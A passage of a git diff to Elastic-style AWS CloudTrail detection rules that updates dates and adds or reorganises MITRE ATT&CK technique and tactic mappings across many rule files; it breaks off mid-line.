+reference = "https://attack.mitre.org/tactics/TA0009/" [rule.threshold] field = ["user.id"] value = 1 diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml index 2fd99ea0bd8..d6fa16acad3 100644 --- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml +++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/21" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,17 +132,21 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id"] value = 10 diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml index f762db3aa20..2dba17cdace 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,22 +82,26 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml index b81501f12d9..dea0d7a8dbb 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,22 +83,26 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml index 67bc1c4472a..90f097c14e0 100644 --- a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml +++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,22 +116,31 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml index 5c526fa7a83..6d037474ff9 100644 --- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml +++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -153,10 +153,12 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" + [[rule.threat.technique.subtechnique]] id = "T1578.002" name = "Create Cloud Instance" @@ -167,13 +169,28 @@ id = "T1578.004" name = "Revert Cloud Instance" reference = "https://attack.mitre.org/techniques/T1578/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[[rule.threat.technique.subtechnique]] +id = "T1074.002" +name = "Remote Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml index a3f2352b5a1..21de01a0535 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,6 +122,7 @@ event.dataset:aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" @@ -131,30 +132,34 @@ reference = "https://attack.mitre.org/techniques/T1070/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml index d441f9f41fd..1d4e6533fa3 100644 --- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml +++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/08" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,22 +99,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml b/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml index 78961ffa98f..5bb8dd40931 100644 --- a/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml +++ b/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/16" integration = ["aws"] maturity = "production" -updated_date = "2025/07/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,31 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml index 197e4fc57fc..9f6d0e9c3f4 100644 --- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml +++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,34 +115,44 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.003" +name = "Cloud Groups" +reference = "https://attack.mitre.org/techniques/T1069/003/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id", "user.name", "source.ip"] value = 25 diff --git a/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml b/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml index b9e3d273e21..e89c2921f67 100644 --- a/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml +++ b/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -210,17 +210,21 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.investigation_fields] field_names = [ "Esql.event_action_count_distinct", diff --git a/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml b/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml index 20d53a4097c..57341cda8d3 100644 --- a/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml +++ b/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/24" integration = ["aws"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,10 +116,17 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" @@ -129,7 +136,6 @@ reference = "https://attack.mitre.org/techniques/T1087/004/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.arn"] diff --git a/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml b/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml index cf02dd8f7c0..f86a9fcfd70 100644 --- a/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml +++ b/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/08/26" maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -146,17 +146,21 @@ from logs-aws.cloudtrail-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.investigation_fields] field_names = [ "Esql.cloud_region_count_distinct", diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml index 1998dca1376..1f86cdc6dea 100644 --- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml +++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique]] id = "T1538" name = "Cloud Service Dashboard" @@ -138,7 +144,6 @@ reference = "https://attack.mitre.org/techniques/T1580/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/execution_cloudshell_environment_created.toml b/rules/integrations/aws/execution_cloudshell_environment_created.toml index dd1be4d86ac..08abce57f78 100644 --- a/rules/integrations/aws/execution_cloudshell_environment_created.toml +++ b/rules/integrations/aws/execution_cloudshell_environment_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/12" integration = ["aws"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,22 +104,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.009" name = "Cloud API" reference = "https://attack.mitre.org/techniques/T1059/009/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml index f410c0aad7a..0be80713d88 100644 --- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml +++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,17 +107,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml index 7164fa9a520..b95f19cbcdd 100644 --- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml +++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,11 +101,16 @@ framework = "MITRE ATT&CK" id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" + +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml index d54fc7697a2..7ac4b8a88ba 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,29 +82,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml b/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml index 5dd56b0f32d..9385daad252 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,22 +73,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml index 0934b06a3a4..85ea184fcbd 100644 --- a/rules/integrations/aws/exfiltration_ec2_export_task.toml +++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,18 +100,30 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" @@ -127,12 +139,10 @@ id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml index a0aa65612d3..69392b27d9b 100644 --- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml +++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -122,6 +122,7 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1020" name = "Automated Exfiltration" @@ -132,36 +133,49 @@ id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml index a0ba6578562..3438596f833 100644 --- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml +++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -151,28 +151,38 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.006" name = "Databases" reference = "https://attack.mitre.org/techniques/T1213/006/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml index 999b1b4a28f..55d8c871c55 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,29 +148,42 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml b/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml index a29a22b0cbc..f37e1f2d02a 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/12" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,17 +148,26 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = 